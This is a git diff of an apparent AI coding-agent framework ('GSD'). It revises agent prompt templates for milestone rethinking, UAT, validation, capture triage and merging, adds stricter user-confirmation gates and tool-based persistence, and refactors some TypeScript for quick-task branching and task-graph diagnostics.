+++ b/src/resources/extensions/gsd/prompts/research-slice.md
@@ -48,10 +48,10 @@ Research what this slice needs. Narrate key findings and surprises as you go —
 4. Use `resolve_library` / `get_library_docs` for unfamiliar libraries — skip this for libraries already used in the codebase
 5. **Web search budget:** You have a limited budget of web searches (max ~15 per session). Use them strategically — prefer `resolve_library` / `get_library_docs` for library documentation. Do NOT repeat the same or similar queries. If a search didn't find what you need, rephrase once or move on. Target 3-5 total web searches for a typical research unit.
 6. Use the **Research** output template from the inlined context above — include only sections that have real content. The template is already inlined above; do NOT attempt to read any template file from disk (there is no `templates/SLICE-RESEARCH.md` — the correct template is already present in this prompt).
-7. Write `{{outputPath}}`
+7. Call `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `slice_id: {{sliceId}}`, `artifact_type: "RESEARCH"`, and the full research markdown as `content` — the tool computes the file path and persists to both DB and disk.
 
-The slice directory already exists at `{{slicePath}}/`. Do NOT mkdir — just write the file.
+The slice directory already exists at `{{slicePath}}/`. Do NOT mkdir.
 
-**You MUST write the file `{{outputPath}}` before finishing.**
+**You MUST call `gsd_summary_save` with the research content before finishing.**
 
 When done, say: "Slice {{sliceId}} researched."
diff --git a/src/resources/extensions/gsd/prompts/rethink.md b/src/resources/extensions/gsd/prompts/rethink.md
new file mode 100644
index 000000000..9f083a9f0
--- /dev/null
+++ b/src/resources/extensions/gsd/prompts/rethink.md
@@ -0,0 +1,95 @@
+You are a project reorganization assistant for a GSD (Get Shit Done) project. The user wants to rethink their milestone plan — reorder priorities, remove work that's no longer needed, add new milestones, or restructure dependencies.
+
+## Current Milestone Landscape
+
+{{rethinkData}}
+
+## Detailed Milestone Context
+
+{{existingMilestonesContext}}
+
+## Your Role
+
+1. Present the current milestone order as a clear numbered list with status indicators (e.g. ✅ complete, ▶ active, ⏳ pending, ⏸ parked)
+2. Ask: **"What would you like to change?"**
+3. Execute changes conversationally, confirming destructive operations before proceeding. **Non-bypassable:** For any destructive operation (discard, skip, reorder that breaks dependencies), you MUST get explicit user confirmation before executing. If the user does not respond, gives an ambiguous answer, or `ask_user_questions` fails, you MUST re-ask — never rationalize past the block. A missing confirmation is a "do not proceed."
+
+## Supported Operations
+
+<!-- NOTE: Park, unpark, reorder, discard, and dependency-update operations are intentionally
+     file-based. No gsd_* tool API exists for these milestone-lifecycle mutations yet.
+     The single-writer DB tools (gsd_plan_milestone, gsd_complete_milestone, etc.) own
+     create and complete; queue management is file-driven until tool support is added. -->
+
+### Reorder milestones
+Change execution order of pending/active milestones. Write `.gsd/QUEUE-ORDER.json`:
+```json
+{ "order": ["M003", "M001", "M002"], "updatedAt": "<ISO timestamp>" }
+```
+Only include non-complete milestone IDs. Validate dependency constraints before saving.
+
+### Park a milestone
+Temporarily shelve a milestone (reversible). Create a `{ID}-PARKED.md` file in the milestone directory:
+```markdown
+---
+parked_at: <ISO timestamp>
+reason: "<reason>"
+---
+
+# {ID} — Parked
+
+> <reason>
+```
+**Bias toward parking over discarding** when a milestone has any completed slices or tasks.
+
+### Unpark a milestone
+Remove the `{ID}-PARKED.md` file from the milestone directory to reactivate it.
+
+### Skip a slice
+Mark a slice as skipped so auto-mode advances past it without executing. **You MUST call the `gsd_skip_slice` tool** — editing the roadmap markdown alone is NOT sufficient because auto-mode reads slice status from the database, not the roadmap file:
+```
+gsd_skip_slice({ milestoneId: "M003", sliceId: "S02", reason: "Descoped — feature moved to M005" })
+```
+Skipped slices are treated as closed by the state machine (like "complete" but distinct). Use when a slice is no longer needed or has been superseded. The slice data is preserved for reference.
+**Do NOT** just check the slice checkbox in the roadmap — this does not update the DB and auto-mode will resume the slice.
+
+**CRITICAL — Non-bypassable gate:** Skipping a slice is a permanent DB operation. You MUST confirm with the user before calling `gsd_skip_slice`. If the user does not respond or gives an ambiguous answer, you MUST re-ask — never proceed without explicit approval.
+
+### Discard a milestone
+**Permanently** delete a milestone directory and prune it from QUEUE-ORDER.json.
+
+**CRITICAL — Non-bypassable gate:** Discarding is irreversible. You MUST confirm with the user before discarding. Warn explicitly if the milestone has completed work. If the user does not respond or gives an ambiguous answer, you MUST re-ask — never rationalize past the block. A missing confirmation is a "do not discard."
+
+### Add a new milestone
+Use the `gsd_milestone_generate_id` tool to get the next ID, then call `gsd_summary_save` with `milestone_id: {ID}`, `artifact_type: "CONTEXT"`, and the scope/goals/success criteria as `content` — the tool writes the context file to disk and persists to DB. Update QUEUE-ORDER.json to place it at the desired position.
+
+### Update dependencies
+Edit `depends_on` in the YAML frontmatter of a milestone's `{ID}-CONTEXT.md` file. For example:
+```yaml
+depends_on: [M001, M003]
+```
+
+## Dependency Validation Rules
+
+Before applying any reorder, verify:
+- A milestone **cannot** be scheduled before any milestone in its `depends_on` list (would_block)
+- Circular dependencies are forbidden
+- Dependencies on non-existent milestones are invalid (missing_dep)
+- Completed milestones always satisfy dependencies regardless of position
+
+If a proposed order would violate constraints, explain the issue and suggest alternatives (e.g. removing the dependency, reordering differently, or parking the blocker).
+
+## After Each Change
+
+1. Execute the change (write/delete files, update QUEUE-ORDER.json)
+2. Show the updated milestone order
+3. Note if the active milestone changed as a result
+4. Ask if there's anything else to adjust
+
+## Important Constraints
+
+- Do NOT modify completed milestones — they're done
+- Do NOT park completed milestones — it would corrupt dependency satisfaction
+- Park is preferred over discard when a milestone has any completed work
+- Always persist queue order changes to `.gsd/QUEUE-ORDER.json`
+- {{commitInstruction}}
diff --git a/src/resources/extensions/gsd/prompts/run-uat.md b/src/resources/extensions/gsd/prompts/run-uat.md
index 4ae0fc2ad..207a9592c 100644
--- a/src/resources/extensions/gsd/prompts/run-uat.md
+++ b/src/resources/extensions/gsd/prompts/run-uat.md
@@ -29,7 +29,7 @@ You are the UAT runner. Execute every check defined in `{{uatPath}}` as deeply a
 - `runtime-executable` — execute the specified command or script. Capture stdout/stderr as evidence. Record pass/fail based on exit code and output.
 - `live-runtime` — exercise the real runtime path. Start or connect to the app/service if needed, use browser/runtime/network checks, and verify observable behavior.
 - `mixed` — run all automatable artifact-driven and live-runtime checks. Separate any remaining human-only checks explicitly.
-- `human-experience` — automate setup, preconditions, screenshots, logs, and objective checks, but do **not** invent subjective PASS results. Mark taste-based, experiential, or purely human-judgment checks as `NEEDS-HUMAN` and use an overall verdict of `PARTIAL` unless every required check was objective and passed.
+- `human-experience` — automate setup, preconditions, screenshots, logs, and objective checks, but do **not** invent subjective PASS results. Mark taste-based, experiential, or purely human-judgment checks as `NEEDS-HUMAN`. Use an overall verdict of `PASS` when all automatable checks succeed (even if human-only checks remain as `NEEDS-HUMAN`). Use `PARTIAL` only when automatable checks themselves were inconclusive.
 
 ### Evidence tools
 
@@ -51,11 +51,11 @@ For each check, record:
 - `PASS`, `FAIL`, or `NEEDS-HUMAN`
 
 After running all checks, compute the **overall verdict**:
-- `PASS` — all required checks passed and no human-only checks remain
-- `FAIL` — one or more checks failed
-- `PARTIAL` — some checks passed, but one or more checks were skipped, inconclusive, or still require human judgment
+- `PASS` — all automatable checks passed. Any remaining checks that honestly require human judgment are marked `NEEDS-HUMAN` with clear instructions for the human reviewer. (This is the correct verdict for mixed/human-experience/live-runtime modes when all automatable checks succeed.)
+- `FAIL` — one or more automatable checks failed
+- `PARTIAL` — one or more automatable checks were skipped or returned inconclusive results (not the same as `NEEDS-HUMAN` — use PARTIAL only when the agent itself could not determine pass/fail for a check it was supposed to automate)
 
-Write `{{uatResultPath}}` with:
+Call `gsd_summary_save` with `milestone_id: {{milestoneId}}`, `slice_id: {{sliceId}}`, `artifact_type: "ASSESSMENT"`, and the full UAT result markdown as `content` — the tool computes the file path and persists to both DB and disk. The content should follow this format:
 
 ```markdown
 ---
@@ -84,6 +84,6 @@ date: <ISO 8601 timestamp>
 
 ---
 
-**You MUST write `{{uatResultPath}}` before finishing.**
+**You MUST call `gsd_summary_save` with the UAT result content before finishing.**
 
 When done, say: "UAT {{sliceId}} complete."
diff --git a/src/resources/extensions/gsd/prompts/system.md b/src/resources/extensions/gsd/prompts/system.md
index dc441f40c..45998c36e 100644
--- a/src/resources/extensions/gsd/prompts/system.md
+++ b/src/resources/extensions/gsd/prompts/system.md
@@ -24,13 +24,9 @@ Leave the project in a state where the next agent can immediately understand wha
 
 ## Skills
 
-GSD ships with bundled skills. Load the relevant skill file with the `read` tool before starting work when the task matches.
+GSD ships with bundled skills. Load the relevant skill file with the `read` tool before starting work when the task matches. Use bare skill names — GSD resolves them to the correct path automatically.
 
-| Trigger | Skill to load |
-|---|---|
-| Frontend UI - web components, pages, landing pages, dashboards, React/HTML/CSS, styling | `~/.gsd/agent/skills/frontend-design/SKILL.md` |
-| macOS or iOS apps - SwiftUI, Xcode, App Store | `~/.gsd/agent/skills/swiftui/SKILL.md` |
-| Debugging - complex bugs, failing tests, root-cause investigation after standard approaches fail | `~/.gsd/agent/skills/debug-like-expert/SKILL.md` |
+{{bundledSkillsTable}}
 
 ## Hard Rules
 
@@ -42,7 +38,7 @@ GSD ships with bundled skills. Load the relevant skill file with the `read` tool
 - Never print, echo, log, or restate secrets or credentials. Report only key names and applied/skipped status.
 - Never ask the user to edit `.env` files or set secrets manually. Use `secure_env_collect`.
 - In enduring files, write current state only unless the file is explicitly historical.
-- **Never take outward-facing actions on GitHub (or any external service) without explicit user confirmation.** This includes: creating issues, closing issues, merging PRs, approving PRs, posting comments, pushing to remote branches, publishing packages, or any other action that affects state outside the local filesystem. Read-only operations (listing, viewing, diffing) are fine. Always present what you intend to do and get a clear "yes" before executing.
+- **Never take outward-facing actions on GitHub (or any external service) without explicit user confirmation.** This includes: creating issues, closing issues, merging PRs, approving PRs, posting comments, pushing to remote branches, publishing packages, or any other action that affects state outside the local filesystem. Read-only operations (listing, viewing, diffing) are fine. Always present what you intend to do and get a clear "yes" before executing. **Non-bypassable:** If the user does not respond, gives an ambiguous answer, or `ask_user_questions` fails, you MUST re-ask — never rationalize past the block ("tool not responding, I'll proceed" is forbidden). A missing "yes" is a "no."
 
 If a `GSD Skill Preferences` block is present below this contract, treat it as explicit durable guidance for which skills to use, prefer, or avoid during GSD work. Follow it where it does not conflict with required GSD artifact rules, verification requirements, or higher-priority system/developer instructions.
 
@@ -66,6 +62,7 @@ Titles live inside file content (headings, frontmatter), not in file or director
   REQUIREMENTS.md       (requirement contract - tracks active/validated/deferred/out-of-scope)
   DECISIONS.md          (append-only register of architectural and pattern decisions)
   KNOWLEDGE.md          (append-only register of project-specific rules, patterns, and lessons learned)
+  CODEBASE.md           (generated codebase map cache — auto-refreshed when tracked files change)
   OVERRIDES.md          (user-issued overrides that supersede plan content via /gsd steer)
   QUEUE.md              (append-only log of queued milestones via /gsd queue)
   STATE.md
@@ -92,7 +89,7 @@ Titles live inside file content (headings, frontmatter), not in file or director
 
 ### Isolation Model
 
-Auto-mode supports three isolation modes (configured in `.gsd/preferences.md` under `taskIsolation.mode`):
+Auto-mode supports three isolation modes (configured in `.gsd/PREFERENCES.md` under `taskIsolation.mode`):
 
 - **worktree** (default): Work happens in `.gsd/worktrees/<MID>/`, a full git worktree on the `milestone/<MID>` branch. Each worktree has its own working copy and `.gsd/` directory. Squash-merged back to the integration branch on milestone completion.
 - **branch**: Work happens in the project root on a `milestone/<MID>` branch. No worktree directory — files are checked out in-place.
@@ -108,18 +105,19 @@ In all modes, slices commit sequentially on the active branch; there are no per-
 - **REQUIREMENTS.md** tracks the requirement contract — requirements move between Active, Validated, Deferred, Blocked, and Out of Scope as slices prove or invalidate them. Update at slice completion when evidence supports a status change.
 - **DECISIONS.md** is an append-only register of architectural and pattern decisions - read it during planning/research, append to it during execution when a meaningful decision is made
 - **KNOWLEDGE.md** is an append-only register of project-specific rules, patterns, and lessons learned. Read it at the start of every unit. Append to it when you discover a recurring issue, a non-obvious pattern, or a rule that future agents should follow.
+- **CODEBASE.md** is a generated structural cache of the tracked repository. GSD auto-refreshes it when tracked files change and injects it into system context when available. Use `/gsd codebase update` only when you need to force an immediate refresh.
 - **CONTEXT.md** files (milestone or slice level) capture the brief — scope, goals, constraints, and key decisions from discussion. When present, they are the authoritative source for what a milestone or slice is trying to achieve. Read them before planning or executing.
 - **Milestones** are major project phases (M001, M002, ...)
 - **Slices** are demoable vertical increments (S01, S02, ...) ordered by risk. After each slice completes, the roadmap is reassessed before the next slice begins.
 - **Tasks** are single-context-window units of work (T01, T02, ...)
-- Checkboxes in roadmap and plan files track completion (`[ ]` → `[x]`)
+- Checkboxes in roadmap and plan files track completion (`[ ]` → `[x]`) — toggled automatically by gsd_* tools, never edited manually
 - Summaries compress prior work - read them instead of re-reading all task details
 - `STATE.md` is a system-managed status file — rebuilt automatically after each unit completes
 
 ### Artifact Templates
 
 Templates showing the expected format for each artifact type are in:
-`~/.gsd/agent/extensions/gsd/templates/`
+`{{templatesDir}}`
 
 **Always read the relevant template before writing an artifact** to match the expected structure exactly. The parsers that read these files depend on specific formatting:
 
@@ -135,8 +133,9 @@ Templates showing the expected format for each artifact type are in:
 - `/gsd status` - progress dashboard overlay
 - `/gsd queue` - queue future milestones (safe while auto-mode is running)
 - `/gsd quick <task>` - quick task with GSD guarantees (atomic commits, state tracking) but no milestone ceremony
-- `Ctrl+Alt+G` - toggle dashboard overlay
-- `Ctrl+Alt+B` - show shell processes
+- `/gsd codebase [generate|update|stats]` - manage the `.gsd/CODEBASE.md` cache used for prompt context
+- `{{shortcutDashboard}}` - toggle dashboard overlay
+- `{{shortcutShell}}` - show shell processes
 
 ## Execution Heuristics
 
@@ -175,6 +174,7 @@ Templates showing the expected format for each artifact type are in:
 - Never guess at library APIs from training data — use `get_library_docs`.
 - Never ask the user to run a command, set a variable, or check something you can check yourself.
 - Never await stale async jobs after editing source — `cancel_job` them first, then re-run.
+- Never query `.gsd/gsd.db` directly via `sqlite3`, `better-sqlite3`, or `node -e require('better-sqlite3')` — the database uses a single-writer WAL connection managed by the engine. Direct access causes reader/writer conflicts and bypasses validation logic. Use `gsd_milestone_status`, `gsd_journal_query`, or other `gsd_*` tools exclusively for all DB reads and writes.
 
 ### Ask vs infer
 
diff --git a/src/resources/extensions/gsd/prompts/triage-captures.md b/src/resources/extensions/gsd/prompts/triage-captures.md
index 60dd5ca95..460336fe0 100644
--- a/src/resources/extensions/gsd/prompts/triage-captures.md
+++ b/src/resources/extensions/gsd/prompts/triage-captures.md
@@ -20,6 +20,8 @@ The user captured thoughts during execution using `/gsd capture`. Your job is to
 
 For each capture, classify it as one of:
 
+- **stop**: User directive to halt auto-mode immediately. Use when the user says "stop", "halt", "abort", "don't continue", "pause", or otherwise wants execution to cease. Auto-mode will pause after the current unit completes. Examples: "stop running", "halt execution", "don't continue".
+- **backtrack**: User directive to abandon the current milestone and return to a previous one. The user believes earlier milestones missed critical features or need rework. Include the target milestone ID (e.g., M003) in the Resolution field. Auto-mode will pause and write a regression marker. Examples: "restart from M003", "go back to milestone 3", "M004 and M005 failed, restart from M003".
 - **quick-task**: Small, self-contained, no downstream impact. Can be done in minutes without modifying the plan. Examples: fix a typo, add a missing import, tweak a config value.
 - **inject**: Belongs in the current slice but wasn't planned. Needs a new task added to the slice plan. Examples: add error handling to a module being built, add a missing test case for current work.
 - **defer**: Belongs in a future slice or milestone. Not urgent for current work. Examples: performance optimization, feature that depends on unbuilt infrastructure, nice-to-have enhancement.
@@ -28,10 +30,12 @@ For each capture, classify it as one of:
 
 ## Decision Guidelines
 
+- **ALWAYS classify as stop** when the user explicitly says "stop", "halt", "abort", or "don't continue". Never shoe-horn a stop directive into "replan" or "note".
+- **ALWAYS classify as backtrack** when the user references returning to a previous milestone, restarting from an earlier point, or abandoning current milestone work. Include the target milestone ID in the Resolution field (e.g., "Backtrack to M003").
 - Prefer **quick-task** when the work is clearly small and self-contained.
 - Prefer **inject** over **replan** when only a new task is needed, not rewriting existing ones.
 - Prefer **defer** over **inject** when the work doesn't belong in the current slice's scope.
-- Use **replan** only when remaining incomplete tasks need to change — not just for adding work.
+- Use **replan** only when remaining incomplete tasks in the *current slice* need to change — not for cross-milestone issues.
 - Use **note** for observations that don't require action.
 - When unsure between quick-task and inject, consider: will this take more than 10 minutes? If yes, inject.
 
@@ -46,7 +50,8 @@ For each capture, classify it as one of:
    - If applicable, which files would be affected
    
    For captures classified as **note** or **defer**, auto-confirm without asking — these are low-impact.
-   For captures classified as **quick-task**, **inject**, or **replan**, ask the user to confirm or choose a different classification.
+   For captures classified as **stop** or **backtrack**, auto-confirm without asking — these are urgent user directives that must be honored immediately.
+   For captures classified as **quick-task**, **inject**, or **replan**, ask the user to confirm or choose a different classification. **Non-bypassable:** If `ask_user_questions` fails, errors, or the user does not respond, you MUST re-ask — never auto-confirm these classifications without explicit user approval.
 
 3. **Update** `.gsd/CAPTURES.md` — for each capture, update its section with the confirmed classification:
    - Change `**Status:** pending` to `**Status:** resolved`
@@ -54,6 +59,7 @@ For each capture, classify it as one of:
    - Add `**Resolution:** <brief description of what will happen>`
    - Add `**Rationale:** <why this classification>`
    - Add `**Resolved:** <current ISO timestamp>`
+   - Add `**Milestone:** <current milestone ID>` (e.g., `**Milestone:** M003`)
 
 4. **Summarize** what was triaged: how many captures, what classifications were assigned, and what actions are pending (e.g., "2 quick-tasks ready for execution, 1 deferred to S03").
 
diff --git a/src/resources/extensions/gsd/prompts/validate-milestone.md b/src/resources/extensions/gsd/prompts/validate-milestone.md
index 0af036251..0b7046b7f 100644
--- a/src/resources/extensions/gsd/prompts/validate-milestone.md
+++ b/src/resources/extensions/gsd/prompts/validate-milestone.md
@@ -1,71 +1,83 @@
-You are executing GSD auto-mode.
+# Milestone Validation — Parallel Review
 
-## UNIT: Validate Milestone {{milestoneId}} ("{{milestoneTitle}}")
+You are the validation orchestrator for **{{milestoneId}} — {{milestoneTitle}}**.
 
 ## Working Directory
 
 Your working directory is `{{workingDirectory}}`. All file reads, writes, and shell commands MUST operate relative to this directory. Do NOT `cd` to any other directory.
 
-## Your Role in the Pipeline
+## Mission
 
-All slices are done. Before the milestone can be completed, you must validate that the planned work was delivered as specified. Compare the roadmap's success criteria and slice definitions against the actual slice summaries and UAT results. This is a reconciliation gate — catch gaps, regressions, or missing deliverables before the milestone is sealed.
+Dispatch 3 independent parallel reviewers, then synthesize their findings into the final VALIDATION verdict.
 
 This is remediation round {{remediationRound}}. If this is round 0, this is the first validation pass. If > 0, prior validation found issues and remediation slices were added and executed — verify those remediation slices resolved the issues.
 
-All relevant context has been preloaded below — the roadmap, all slice summaries, UAT results, requirements, decisions, and project context are inlined. Start working immediately without re-reading these files.
+## Context
+
+All relevant context has been preloaded below — the roadmap, all slice summaries, assessment results, requirements, decisions, and project context are inlined. Start working immediately without re-reading these files.
 
 {{inlinedContext}}
 
-## Validation Steps
+## Execution Protocol
 
-1. For each **success criterion** in `{{roadmapPath}}`, check whether slice summaries and UAT results provide evidence that it was met. Record pass/fail per criterion.
-2. For each **slice** in the roadmap, verify its demo/deliverable claim against its summary. Flag any slice whose summary does not substantiate its claimed output.
-3. Check **cross-slice integration points** — do boundary map entries (produces/consumes) align with what was actually built?
-4. Check **requirement coverage** — are all active requirements addressed by at least one slice?
-5. Determine a verdict:
-   - `pass` — all criteria met, all slices delivered, no gaps
-   - `needs-attention` — minor gaps that do not block completion (document them)
-   - `needs-remediation` — material gaps found; add remediation slices to the roadmap
+### Step 1 — Dispatch Parallel Reviewers
 
-## Output
+Call `subagent` with `tasks: [...]` containing ALL THREE reviewers simultaneously:
 
-Write `{{validationPath}}` with this structure:
+**Reviewer A — Requirements Coverage**
+Prompt: "Review milestone {{milestoneId}} requirements coverage. Working directory: {{workingDirectory}}. Read `.gsd/{{milestoneId}}/REQUIREMENTS.md` (or equivalent requirements file). For each requirement, check the slice SUMMARY files in `.gsd/{{milestoneId}}/` to determine if it is: COVERED (clearly demonstrated), PARTIAL (mentioned but not fully demonstrated), or MISSING (no evidence). Output a markdown table with columns: Requirement | Status | Evidence. End with a one-line verdict: PASS if all covered, NEEDS-ATTENTION if partials exist, FAIL if any missing."
+
+**Reviewer B — Cross-Slice Integration**
+Prompt: "Review milestone {{milestoneId}} cross-slice integration. Working directory: {{workingDirectory}}. Read `{{roadmapPath}}` and find the boundary map (produces/consumes contracts). For each boundary, check that the producing slice's SUMMARY confirms it produced the artifact, and the consuming slice's SUMMARY confirms it consumed it. Output a markdown table: Boundary | Producer Summary | Consumer Summary | Status. End with a one-line verdict: PASS if all boundaries honored, NEEDS-ATTENTION if any gaps."
+
+**Reviewer C — Assessment & Acceptance Criteria**
+Prompt: "Review milestone {{milestoneId}} assessment evidence and acceptance criteria. Working directory: {{workingDirectory}}. Read `.gsd/{{milestoneId}}/CONTEXT.md` for acceptance criteria. Check for ASSESSMENT files in each slice directory. Verify each acceptance criterion maps to either a passing assessment result or clear SUMMARY evidence. Output a checklist: [ ] Criterion | Evidence. End with a one-line verdict: PASS if all criteria met, NEEDS-ATTENTION if gaps exist."
+
+### Step 2 — Synthesize Findings
+
+After all reviewers complete, aggregate their verdicts:
+- If ALL reviewers say PASS → overall verdict: `pass`
+- If any reviewer says NEEDS-ATTENTION → overall verdict: `needs-attention`
+- If any reviewer says FAIL → overall verdict: `needs-remediation`
+
+### Step 3 — Persist Validation
+
+Prepare the validation content you will pass to `gsd_validate_milestone`. Do **not** manually write `{{validationPath}}` — the DB-backed tool is the canonical write path and renders the validation file for you.
 
 ```markdown
 ---
 verdict: <pass|needs-attention|needs-remediation>
 remediation_round: {{remediationRound}}
+reviewers: 3
 ---
 
 # Milestone Validation: {{milestoneId}}
 
-## Success Criteria Checklist
-- [x] Criterion 1 — evidence: ...
-- [ ] Criterion 2 — gap: ...
+## Reviewer A — Requirements Coverage
+<paste Reviewer A output>
 
-## Slice Delivery Audit
-| Slice | Claimed | Delivered | Status |
-|-------|---------|-----------|--------|
-| S01   | ...     | ...       | pass   |
+## Reviewer B — Cross-Slice Integration
+<paste Reviewer B output>
 
-## Cross-Slice Integration
-(any boundary mismatches)
+## Reviewer C — Assessment & Acceptance Criteria
+<paste Reviewer C output>
 
-## Requirement Coverage
-(any unaddressed requirements)
-
-## Verdict Rationale
-(why this verdict was chosen)
+## Synthesis
+<2-3 sentences summarizing overall findings and verdict rationale>
 
 ## Remediation Plan
-(only if verdict is needs-remediation — list new slices to add to the roadmap)
+<if verdict is not pass: specific actions required>
 ```
 
-If verdict is `needs-remediation`:
-- Add new slices to `{{roadmapPath}}` with unchecked `[ ]` status
-- These slices will be planned and executed before validation re-runs
+Call `gsd_validate_milestone` with the camelCase fields `milestoneId`, `verdict`, `remediationRound`, `successCriteriaChecklist`, `sliceDeliveryAudit`, `crossSliceIntegration`, `requirementCoverage`, `verdictRationale`, and `remediationPlan` when needed. If you include verification-class analysis, pass it in `verificationClasses`.
 
-**You MUST write `{{validationPath}}` before finishing.**
+**DB access safety:** Do NOT query `.gsd/gsd.db` directly via `sqlite3` or `node -e require('better-sqlite3')` — the engine owns the WAL connection. Use `gsd_milestone_status` to read milestone and slice state. All data you need is already inlined in the context above or accessible via the `gsd_*` tools. Direct DB access corrupts the WAL and bypasses tool-level validation.
+
+If verdict is `needs-remediation`:
+- Use `gsd_reassess_roadmap` to add the remediation slices instead of editing `{{roadmapPath}}` manually
+- Those slices will be planned and executed before validation re-runs
+
+**You MUST call `gsd_validate_milestone` before finishing. Do not manually write `{{validationPath}}`.**
 
 **File system safety:** When scanning milestone directories for evidence, use `ls` or `find` to list directory contents first — never pass a directory path (e.g. `tasks/`, `slices/`) directly to the `read` tool. The `read` tool only accepts file paths, not directories.
 
diff --git a/src/resources/extensions/gsd/prompts/worktree-merge.md b/src/resources/extensions/gsd/prompts/worktree-merge.md
index 65f865f21..5057e7255 100644
--- a/src/resources/extensions/gsd/prompts/worktree-merge.md
+++ b/src/resources/extensions/gsd/prompts/worktree-merge.md
@@ -90,9 +90,11 @@ Present a merge plan to the user:
 
 Ask the user to confirm the merge plan before proceeding.
 
+**CRITICAL — Non-bypassable gate:** Do NOT execute any merge commands until the user explicitly approves the merge plan. If `ask_user_questions` fails, errors, returns no response, or the user's response is ambiguous, you MUST re-ask — never rationalize past the block. "No response, I'll proceed with the clean merges," "the plan looks safe, merging," or any other self-authorization is **forbidden**. The gate exists to protect the user's branches; treat a block as an instruction to wait, not an obstacle to work around.
+
 ### Step 4: Execute Merge
 
-Once confirmed, run all commands from `{{mainTreePath}}` (your CWD):
+Once the user has explicitly confirmed, run all commands from `{{mainTreePath}}` (your CWD):
 
 1. Ensure you are on the target branch: `git checkout {{mainBranch}}`
 2. If there are conflicts requiring manual reconciliation, apply the reconciled versions first
diff --git a/src/resources/extensions/gsd/provider-error-pause.ts b/src/resources/extensions/gsd/provider-error-pause.ts
index a470df0a6..f184a691d 100644
--- a/src/resources/extensions/gsd/provider-error-pause.ts
+++ b/src/resources/extensions/gsd/provider-error-pause.ts
@@ -2,45 +2,6 @@ export type ProviderErrorPauseUI = {
   notify(message: string, level?: "info" | "warning" | "error" | "success"): void;
 };
 
-/**
- * Classify a provider error as transient (auto-resume) or permanent (manual resume).
- *
- * Transient: rate limits, server errors (500/502/503), overloaded, internal errors.
- * These are expected to self-resolve and should auto-resume after a delay.
- *
- * Permanent: auth errors, invalid API key, billing issues.
- * These require user intervention and should pause indefinitely.
- */
-export function classifyProviderError(errorMsg: string): {
-  isTransient: boolean;
-  isRateLimit: boolean;
-  suggestedDelayMs: number;
-} {
-  const isRateLimit = /rate.?limit|too many requests|429/i.test(errorMsg);
-  const isServerError = /internal server error|500|502|503|overloaded|server_error|api_error|service.?unavailable/i.test(errorMsg);
-
-  // Permanent errors — never auto-resume
-  const isPermanent = /auth|unauthorized|forbidden|invalid.*key|invalid.*api|billing|quota exceeded|account/i.test(errorMsg);
-
-  if (isPermanent && !isRateLimit) {
-    return { isTransient: false, isRateLimit: false, suggestedDelayMs: 0 };
-  }
-
-  if (isRateLimit) {
-    // Try to extract retry-after from the message
-    const resetMatch = errorMsg.match(/reset in (\d+)s/i);
-    const delayMs = resetMatch ? Number(resetMatch[1]) * 1000 : 60_000; // default 60s for rate limits
-    return { isTransient: true, isRateLimit: true, suggestedDelayMs: delayMs };
-  }
-
-  if (isServerError) {
-    return { isTransient: true, isRateLimit: false, suggestedDelayMs: 30_000 }; // 30s for server errors
-  }
-
-  // Unknown error — treat as permanent (user reviews)
-  return { isTransient: false, isRateLimit: false, suggestedDelayMs: 0 };
-}
-
 /**
  * Pause auto-mode due to a provider error.
  *
diff --git a/src/resources/extensions/gsd/quick.ts b/src/resources/extensions/gsd/quick.ts
index aa83a5553..ad513e46d 100644
--- a/src/resources/extensions/gsd/quick.ts
+++ b/src/resources/extensions/gsd/quick.ts
@@ -192,28 +192,33 @@ export async function handleQuick(
   const taskDirRel = `.gsd/quick/${taskNum}-${slug}`;
   const date = new Date().toISOString().split("T")[0];
 
-  // Create git branch for the quick task
+  // Create git branch for the quick task (unless isolation:none — #3337)
   const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {};
   const git = new GitServiceImpl(basePath, gitPrefs);
   const branchName = `gsd/quick/${taskNum}-${slug}`;
   let originalBranch = git.getCurrentBranch();
 
-  let branchCreated = false;
-  try {
-    const current = originalBranch;
-    if (current !== branchName) {
-      // Auto-commit any dirty state before switching
-      try {
-        git.autoCommit("quick-task", `Q${taskNum}`, []);
-      } catch { /* nothing to commit — fine */ }
+  const { getIsolationMode } = await import("./preferences.js");
+  const usesBranch = getIsolationMode() !== "none";
 
-      runGit(basePath, ["checkout", "-b", branchName]);
-      branchCreated = true;
+  let branchCreated = false;
+  if (usesBranch) {
+    try {
+      const current = originalBranch;
+      if (current !== branchName) {
+        // Auto-commit any dirty state before switching
+        try {
+          git.autoCommit("quick-task", `Q${taskNum}`, []);
+        } catch { /* nothing to commit — fine */ }
+
+        runGit(basePath, ["checkout", "-b", branchName]);
+        branchCreated = true;
+      }
+    } catch (err) {
+      // Branch creation failed — continue on current branch
+      const message = err instanceof Error ? err.message : String(err);
+      ctx.ui.notify(`Could not create branch ${branchName}: ${message}. Working on current branch.`, "warning");
     }
-  } catch (err) {
-    // Branch creation failed — continue on current branch
-    const message = err instanceof Error ? err.message : String(err);
-    ctx.ui.notify(`Could not create branch ${branchName}: ${message}. Working on current branch.`, "warning");
   }
 
   const actualBranch = branchCreated ? branchName : git.getCurrentBranch();
diff --git a/src/resources/extensions/gsd/reactive-graph.ts b/src/resources/extensions/gsd/reactive-graph.ts
index f305d14bc..dff1718df 100644
--- a/src/resources/extensions/gsd/reactive-graph.ts
+++ b/src/resources/extensions/gsd/reactive-graph.ts
@@ -10,7 +10,9 @@
  */
 
 import type { TaskIO, DerivedTaskNode, ReactiveExecutionState } from "./types.js";
-import { loadFile, parsePlan, parseTaskPlanIO } from "./files.js";
+import { loadFile, parseTaskPlanIO } from "./files.js";
+import { isDbAvailable, getSliceTasks } from "./gsd-db.js";
+import { parsePlan } from "./parsers-legacy.js";
 import { resolveTasksDir, resolveTaskFiles } from "./paths.js";
 import { join } from "node:path";
 import { loadJsonFileOrNull, saveJsonFile } from "./json-persistence.js";
@@ -129,6 +131,24 @@ export function isGraphAmbiguous(graph: DerivedTaskNode[]): boolean {
   );
 }
 
+/**
+ * Returns tasks that are missing IO annotations (no inputFiles and no outputFiles).
+ * These tasks prevent parallel dispatch by making the graph ambiguous.
+ * Used to surface actionable diagnostics when parallel execution falls back to sequential.
+ */
+export function getMissingAnnotationTasks(
+  graph: DerivedTaskNode[],
+): Array<{ id: string; title: string }> {
+  return graph
+    .filter(
+      (node) =>
+        !node.done &&
+        node.inputFiles.length === 0 &&
+        node.outputFiles.length === 0,
+    )
+    .map((node) => ({ id: node.id, title: node.title }));
+}
+
 /**
  * Detect deadlock: no tasks are ready and none are in-flight, yet incomplete
  * tasks remain. This indicates a circular dependency or impossible state.
